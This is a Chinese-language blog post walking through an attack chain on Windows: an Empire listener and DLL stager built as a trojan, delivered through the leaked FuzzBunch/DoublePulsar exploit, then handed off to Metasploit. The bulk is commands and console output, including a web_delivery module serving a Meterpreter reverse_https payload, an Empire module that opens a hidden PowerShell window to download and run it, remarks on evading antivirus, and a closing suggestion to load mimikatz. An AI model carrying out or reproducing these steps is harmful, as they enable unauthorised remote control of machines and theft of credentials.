利用Empire桥接Metasploit和ShadowBroker发布的FuzzBunch

ShadowBroker发布的FuzzBunch一石激起千层浪。Windows从XP到8无一幸免,真可谓腥风血雨。我自然也免不了要尝鲜,确实味道不错。但是在使用工具时有个问题,msfvenom直接生成的dll小马儿植入Windows 7后,会导致Windows重启,这对于我这个Metasploit粉来说,不可接受,但也无奈。

后来各种利用手段层出不穷,让我认识到,除了使用DanderSpritz外,Empire也可以生成马儿。

Empire,https://www.powershellempire.com/,一个PowerShell的马儿控制器。因为是PowerShell,所以基本免杀。

Empire的安装,基本上就是clone下来,然后运行

sudo ./setup/install.sh  
sudo ./empire  

1.Empire生成马儿

首先建立Listenr

listeners  
set Name Eternalblue  
set Host http://10.11.1.16  
set Port 5555  
set DefaultDelay 0  
execute  

然后生成马儿

usestager dll Eternalblue  
set Arch x64  
set OutFile /var/www/html/launcher.dll  
execute  

2.利用FuzzBunch上送马儿到攻击目标

FuzzBunch的安装,配置和使用,这个不再叙述,文章太多。最后用DoublePulse将马儿上送攻击目标,几秒钟应该就可以看到马儿来连接控制器了
之后你可以用Empire做控制,但不是本文的重点,谁让我是Metasploit粉

3.使用模块Invoke-MetasploitPayload翻转控制

Invoke-MetasploitPayload模块的官方地址如下:https://github.com/jaredhaight/Invoke-MetasploitPayload

先在Metasploit建立起listener

use exploit/multi/script/web_delivery  
set SRVHOST 0.0.0.0  
set SRVPORT 4444  
set SSL true  
set target 2  
#2 is for PowerShell
set payload windows/meterpreter/reverse_https  
set LHOST 0.0.0.0  
set LPORT 4444  
run -j  

Metasploit会开始启动Listener

msf exploit(web_delivery) > run -j  
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://10.211.55.4:4444/
[*] Using URL: http://0.0.0.0:4444/posh-payload
[*] Local IP: http://10.211.55.4:4444/xxxxxx
[*] Server started.

之后在Empire来做翻转,讲主动权交给metasploit

(Empire) > usemodule code_execution/invoke_metasploitpayload
(Empire: code_execution/invoke_metasploitpayload) > info

           Name: Invoke-MetasploitPayload
         Module: code_execution/invoke_metasploitpayload
     NeedsAdmin: False
      OpsecSafe: True
   MinPSVersion: 2
     Background: False
OutputExtension: None

Authors:  
  @jaredhaight

Description:  
  Spawns a new, hidden PowerShell window that downloadsand
  executes a Metasploit payload. This relies on
  theexploit/multi/scripts/web_delivery metasploit module.

Options:

  Name  Required    Value                     Description
  ----  --------    -------                   -----------
  URL   True                                  URL from the Metasploit web_delivery    
                                              module                                  
  Agent True                                  Agent to run Metasploit payload on.     

(Empire: code_execution/invoke_metasploitpayload) > set URL http://10.211.55.4:4444/xxxxxx
(Empire: code_execution/invoke_metasploitpayload) > execute

可以看到就是将Metasploit的Local地址付给URL即可。execute之后,Metasploit就可以拿到控制权了。然后就执行你想要的命令吧,比如load mimikatz,哈哈哈,到此为止。

转载请注明出处:https://story.tonylee.name/2017/05/05/li-yong-empireqiao-jie-metasploithe-shadowbrokerfa-bu-de-fuzzbunch/